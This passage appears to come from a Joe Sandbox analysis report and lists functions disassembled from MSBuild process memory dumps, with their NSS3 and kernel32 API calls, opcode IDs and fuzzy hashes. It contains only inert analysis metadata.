                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: free$Value$CriticalDeleteSection
                                                                                        • String ID:
                                                                                        • API String ID: 195087141-0
                                                                                        • Opcode ID: a6f93c58af2258cb3238b33c17cedbc786737f7b1bcb74f01cf139ad9a944cca
                                                                                        • Instruction ID: 716e50720754ef74767aa73eaf008c587baff73b95787657ec012776d61fd420
                                                                                        • Opcode Fuzzy Hash: a6f93c58af2258cb3238b33c17cedbc786737f7b1bcb74f01cf139ad9a944cca
                                                                                        • Instruction Fuzzy Hash: 6D112E74604B508BCB10BF7AC44955EBFF4BF45749F454A6DD8CA87A00EB34A094CB96
                                                                                        Function 6C68E520 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_EnterMonitor.NSS3(00000000,?,?,6C697F5D,00000000,00000000,?,?,?,6C6980DD), ref: 6C68E532
                                                                                          • Part of subcall function 6C749090: TlsGetValue.KERNEL32 ref: 6C7490AB
                                                                                          • Part of subcall function 6C749090: TlsGetValue.KERNEL32 ref: 6C7490C9
                                                                                          • Part of subcall function 6C749090: EnterCriticalSection.KERNEL32 ref: 6C7490E5
                                                                                          • Part of subcall function 6C749090: TlsGetValue.KERNEL32 ref: 6C749116
                                                                                          • Part of subcall function 6C749090: LeaveCriticalSection.KERNEL32 ref: 6C74913F
                                                                                        • PR_EnterMonitor.NSS3(6C6980DD), ref: 6C68E549
                                                                                          • Part of subcall function 6C749090: LeaveCriticalSection.KERNEL32 ref: 6C7491AA
                                                                                          • Part of subcall function 6C749090: TlsGetValue.KERNEL32 ref: 6C749212
                                                                                          • Part of subcall function 6C749090: _PR_MD_WAIT_CV.NSS3 ref: 6C74926B
                                                                                        • PR_ExitMonitor.NSS3 ref: 6C68E56D
                                                                                        • PL_HashTableDestroy.NSS3 ref: 6C68E57B
                                                                                          • Part of subcall function 6C68E190: PR_EnterMonitor.NSS3(?,?,6C68E175), ref: 6C68E19C
                                                                                          • Part of subcall function 6C68E190: PR_EnterMonitor.NSS3(6C68E175), ref: 6C68E1AA
                                                                                          • Part of subcall function 6C68E190: PR_ExitMonitor.NSS3 ref: 6C68E208
                                                                                          • Part of subcall function 6C68E190: PL_HashTableRemove.NSS3(?), ref: 6C68E219
                                                                                          • Part of subcall function 6C68E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C68E231
                                                                                          • Part of subcall function 6C68E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C68E249
                                                                                          • Part of subcall function 6C68E190: PR_ExitMonitor.NSS3 ref: 6C68E257
                                                                                        • PR_ExitMonitor.NSS3(6C6980DD), ref: 6C68E5B5
                                                                                        • PR_DestroyMonitor.NSS3 ref: 6C68E5C3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Monitor$Enter$ExitValue$CriticalSection$Arena_DestroyFreeHashLeaveTableUtil$Remove
                                                                                        • String ID:
                                                                                        • API String ID: 3740585915-0
                                                                                        • Opcode ID: 8df6b8c2f18251b1c6bf23418538fe0d3eb834f8b43397109de7dfb575dc4183
                                                                                        • Instruction ID: cc87d72c2d08b110838d3890f40ed1a5b6b369141b3eae7fade93b42af39c4e2
                                                                                        • Opcode Fuzzy Hash: 8df6b8c2f18251b1c6bf23418538fe0d3eb834f8b43397109de7dfb575dc4183
                                                                                        • Instruction Fuzzy Hash: 1D0180B6E11280CBEF805B68DA09EA13BB8F71B74CF041036D81481A61FF325658FB96
                                                                                        Function 6C60E4C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 92COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108D2,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C60E53A
                                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000108BD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C60E5BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_log
                                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                        • API String ID: 632333372-598938438
                                                                                        • Opcode ID: e14126c7ace701a46523f90b9368760de071ac86eb81ba8448da5d4d38f5e59c
                                                                                        • Instruction ID: 40de20b1201bbcecb85e9b8327db6a9ece0476573a9f03a38a29879cdc724e72
                                                                                        • Opcode Fuzzy Hash: e14126c7ace701a46523f90b9368760de071ac86eb81ba8448da5d4d38f5e59c
                                                                                        • Instruction Fuzzy Hash: 2E3146317007255BC3168EA9C9819ABB3A0EB41314B540D7DE888B7B81F372E945C7E8
                                                                                        Function 6C6F6DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_MillisecondsToInterval.NSS3(?), ref: 6C6F6E36
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6F6E57
                                                                                          • Part of subcall function 6C72C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C72C2BF
                                                                                        • PR_MillisecondsToInterval.NSS3(?), ref: 6C6F6E7D
                                                                                        • PR_MillisecondsToInterval.NSS3(?), ref: 6C6F6EAA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: IntervalMilliseconds$ErrorValue
                                                                                        • String ID: nyl
                                                                                        • API String ID: 3163584228-467026884
                                                                                        • Opcode ID: c127656f6fbbf9875808b6affc78e270348651c97f2b8e586119af5a2584c62e
                                                                                        • Instruction ID: 41af5cfaca3f9e4d94bc31b9e29f5fba0e587043b64ddb54881efeb2829e9ad9
                                                                                        • Opcode Fuzzy Hash: c127656f6fbbf9875808b6affc78e270348651c97f2b8e586119af5a2584c62e
                                                                                        • Instruction Fuzzy Hash: 7231F533618612EFDB145F34DD08396BBA6AB0531AF10063CD4AAD2A40EB31E85BCF85
                                                                                        Function 6C686420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(FFFFE001,00000000,00000001,00000000,00000000,?,?,6C685DEF,?,?,?), ref: 6C686456
                                                                                        • CERT_NewTempCertificate.NSS3(?,?,00000000,00000000,00000001,00000001,00000000,00000000,?,?,6C685DEF,?,?,?), ref: 6C686476
                                                                                        • CERT_DestroyCertificate.NSS3(00000000,?,?,?,?,?,?,6C685DEF,?,?,?), ref: 6C6864A0
                                                                                        • PR_SetError.NSS3(FFFFE020,00000000,00000001,00000000,00000000,?,?,6C685DEF,?,?,?), ref: 6C6864C2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CertificateError$DestroyTemp
                                                                                        • String ID: ]hl
                                                                                        • API String ID: 3886907618-2786816073
                                                                                        • Opcode ID: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
                                                                                        • Instruction ID: 0a19c55f07475f3a17e5cef6362d2306877db278b1eca2095ab66b842cacf706
                                                                                        • Opcode Fuzzy Hash: 69f7a8026667b2e723c64be03bd8d7d7b0b57e47e95c4ffce8af3ad3ba9e6179
                                                                                        • Instruction Fuzzy Hash: AB21E7B1A122016BEB209E68DC09BAB76E9EF40318F148538F51AC6B41E7B2D558C7B5
                                                                                        Function 6C6D4590 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PORT_Alloc_Util.NSS3(00000008,?,6C6D473B,00000000,?,6C6C7A4F,?), ref: 6C6D459B
                                                                                          • Part of subcall function 6C6E0BE0: malloc.MOZGLUE(6C6D8D2D,?,00000000,?), ref: 6C6E0BF8
                                                                                          • Part of subcall function 6C6E0BE0: TlsGetValue.KERNEL32(6C6D8D2D,?,00000000,?), ref: 6C6E0C15
                                                                                        • TlsGetValue.KERNEL32(?,?,6C6D473B,00000000,?,6C6C7A4F,?), ref: 6C6D45BF
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C6D473B,00000000,?,6C6C7A4F,?), ref: 6C6D45D3
                                                                                        • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C6D473B,00000000,?,6C6C7A4F,?), ref: 6C6D45E8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value$Alloc_CriticalEnterSectionUnlockUtilmalloc
                                                                                        • String ID: Ozll
                                                                                        • API String ID: 2963671366-907637545
                                                                                        • Opcode ID: fe999a586282822cecac339f4cdda4513b365f85a546f845fc7e9d0f52adffa8
                                                                                        • Instruction ID: 8c94a3a6e002c328373571e60b815ce926b431382d886cb530549c15d57d2b8e
                                                                                        • Opcode Fuzzy Hash: fe999a586282822cecac339f4cdda4513b365f85a546f845fc7e9d0f52adffa8
                                                                                        • Instruction Fuzzy Hash: E82100B0A00206ABDB009F69DC495AABBB4FF0A309F004139E849C7B10EB31F924CB95
                                                                                        Function 6C670DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C670BDE), ref: 6C670DCB
                                                                                        • strrchr.VCRUNTIME140(00000000,0000005C,?,6C670BDE), ref: 6C670DEA
                                                                                        • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C670BDE), ref: 6C670DFC
                                                                                        • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C670BDE), ref: 6C670E32
                                                                                        Strings
                                                                                        • %s incr => %d (find lib), xrefs: 6C670E2D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: strrchr$Print_stricmp
                                                                                        • String ID: %s incr => %d (find lib)
                                                                                        • API String ID: 97259331-2309350800
                                                                                        • Opcode ID: 0b8b72a8f5620ca0fd73b2dafb0b2fcb8797e11912de86fd5ef7dd79bbdb4908
                                                                                        • Instruction ID: a7815b9e6466cab06a498284822d298459f99c72c1f8b21a931a92f12bcf971a
                                                                                        • Opcode Fuzzy Hash: 0b8b72a8f5620ca0fd73b2dafb0b2fcb8797e11912de86fd5ef7dd79bbdb4908
                                                                                        • Instruction Fuzzy Hash: 8201D4727002149FE6209F249C49E1773ACDF45B09B15487DE949D3B41E762FC1587F1
                                                                                        Function 6C6B2520 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_LogPrint.NSS3(C_GetFunctionList), ref: 6C6B2538
                                                                                        • PR_LogPrint.NSS3( ppFunctionList = 0x%p,?), ref: 6C6B2551
                                                                                          • Part of subcall function 6C7909D0: PR_Now.NSS3 ref: 6C790A22
                                                                                          • Part of subcall function 6C7909D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6C790A35
                                                                                          • Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6C790A66
                                                                                          • Part of subcall function 6C7909D0: PR_GetCurrentThread.NSS3 ref: 6C790A70
                                                                                          • Part of subcall function 6C7909D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6C790A9D
                                                                                          • Part of subcall function 6C7909D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6C790AC8
                                                                                          • Part of subcall function 6C7909D0: PR_vsmprintf.NSS3(?,?), ref: 6C790AE8
                                                                                          • Part of subcall function 6C7909D0: EnterCriticalSection.KERNEL32(?), ref: 6C790B19
                                                                                          • Part of subcall function 6C7909D0: OutputDebugStringA.KERNEL32(00000000), ref: 6C790B48
                                                                                          • Part of subcall function 6C7909D0: _PR_MD_UNLOCK.NSS3(?), ref: 6C790C76
                                                                                          • Part of subcall function 6C7909D0: PR_LogFlush.NSS3 ref: 6C790C7E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrintR_snprintf$CriticalCurrentDebugEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime
                                                                                        • String ID: ppFunctionList = 0x%p$C_GetFunctionList$nyl
                                                                                        • API String ID: 1907330108-919390699
                                                                                        • Opcode ID: de272fbb5591b5a6dadab585ed3234b87bc00dcc093bd52e03b200d0dfa0c560
                                                                                        • Instruction ID: 824a77b5236c679b2c7979750bb1958336e56750cec073cd6f3efb688d26c7af
                                                                                        • Opcode Fuzzy Hash: de272fbb5591b5a6dadab585ed3234b87bc00dcc093bd52e03b200d0dfa0c560
                                                                                        • Instruction Fuzzy Hash: 3901F1773000459FCB90DB68DA8CB5537F1EB8B329F084435E508E3610DF389959CBA6
                                                                                        Function 6C72AC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PK11_FreeSymKey.NSS3(?,@]ql,00000000,?,?,6C706AC6,?), ref: 6C72AC2D
                                                                                          • Part of subcall function 6C6CADC0: TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE10
                                                                                          • Part of subcall function 6C6CADC0: EnterCriticalSection.KERNEL32(?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE24
                                                                                          • Part of subcall function 6C6CADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C6AD079,00000000,00000001), ref: 6C6CAE5A
                                                                                          • Part of subcall function 6C6CADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE6F
                                                                                          • Part of subcall function 6C6CADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAE7F
                                                                                          • Part of subcall function 6C6CADC0: TlsGetValue.KERNEL32(?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEB1
                                                                                          • Part of subcall function 6C6CADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C6ACDBB,?,6C6AD079,00000000,00000001), ref: 6C6CAEC9
                                                                                        • PK11_FreeSymKey.NSS3(?,@]ql,00000000,?,?,6C706AC6,?), ref: 6C72AC44
                                                                                        • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]ql,00000000,?,?,6C706AC6,?), ref: 6C72AC59
                                                                                        • free.MOZGLUE(8CB6FF01,6C706AC6,?,?,?,?,?,?,?,?,?,?,6C715D40,00000000,?,6C71AAD4), ref: 6C72AC62
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                        • String ID: @]ql
                                                                                        • API String ID: 1595327144-2887016198
                                                                                        • Opcode ID: 0b4151bf3910b2968358ba82b618589b206eebdd8e1a08bcd1b52a76fa3efdcf
                                                                                        • Instruction ID: 364135853c11b501f144e02006c8e4160c33c3e0808f72d7e31ed5b4d02d84cd
                                                                                        • Opcode Fuzzy Hash: 0b4151bf3910b2968358ba82b618589b206eebdd8e1a08bcd1b52a76fa3efdcf
                                                                                        • Instruction Fuzzy Hash: 4B0128B56002149BDB00DF15E9C0B5677A8EB45B6DF1880A8E9498F706D735F888CBA6
                                                                                        Function 6C6CC590 Relevance: 7.7, APIs: 5, Instructions: 155COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C6CC5C7
                                                                                        • PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C6CC603
                                                                                        • PK11_DoesMechanism.NSS3(?,?,?,?), ref: 6C6CC636
                                                                                        • PK11_FreeSymKey.NSS3(?), ref: 6C6CC6D7
                                                                                        • PK11_FreeSymKey.NSS3(?), ref: 6C6CC6E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: K11_$DoesMechanism$Free
                                                                                        • String ID:
                                                                                        • API String ID: 3860933388-0
                                                                                        • Opcode ID: 8b7663e3ecf5973aa3a6b70a93720c90d22a318fc2bdfbaca01fb7b7c1fc4d40
                                                                                        • Instruction ID: 3c03420a42476238219d27d2ae80fee7d9f38219c830ee838094c6c969895a54
                                                                                        • Opcode Fuzzy Hash: 8b7663e3ecf5973aa3a6b70a93720c90d22a318fc2bdfbaca01fb7b7c1fc4d40
                                                                                        • Instruction Fuzzy Hash: 084164B560120AAFDB01AF69DD80DAB77A9EF19348B500034FD45D7710E731ED25CBAA
                                                                                        Function 6C626D2E Relevance: 7.6, APIs: 5, Instructions: 148COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 6C613C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C613C66
                                                                                          • Part of subcall function 6C613C40: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C613D04
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C626DC0
                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C626DE5
                                                                                          • Part of subcall function 6C628010: _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C62807D
                                                                                          • Part of subcall function 6C628010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6280D1
                                                                                          • Part of subcall function 6C628010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C62810E
                                                                                          • Part of subcall function 6C628010: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C628140
                                                                                        • memcpy.VCRUNTIME140(00000004,00000004,00000000), ref: 6C626E7E
                                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C626E96
                                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C626EC2
                                                                                          • Part of subcall function 6C627D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C627E27
                                                                                          • Part of subcall function 6C627D70: _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C627E67
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2383759564.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                        • Associated: 00000004.00000002.2383730771.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2385733567.000000006C79F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386069150.000000006C7DE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386120788.000000006C7DF000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386152856.000000006C7E0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.2386187014.000000006C7E5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c600000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: _byteswap_ulong$memcpy$_byteswap_ushort
                                                                                        • String ID:
                                                                                        • API String ID: 3070372028-0
                                                                                        • Opcode ID: 848c820c84e3ba32651aa9a9d26f40a2b88f3f9ef7b005cdd258c69f0d4c2721
                                                                                        • Instruction ID: f766961084bdcef6f331dc950359e3dc46bd481588db538c81c8144d13e12620
                                                                                        • Opcode Fuzzy Hash: 848c820c84e3ba32651aa9a9d26f40a2b88f3f9ef7b005cdd258c69f0d4c2721
                                                                                        • Instruction Fuzzy Hash: 0251A0719083519FC724CF25C850B6ABBE5FF89318F04895DE89987B41E734E918CF96
                                                                                        Function 6C712460 Relevance: 7.6, APIs: 5, Instructions: 105memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PR_SetError.NSS3(FFFFE005,00000000,6C7B7379,00000002,?), ref: 6C712493
                                                                                        • PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C7124B4
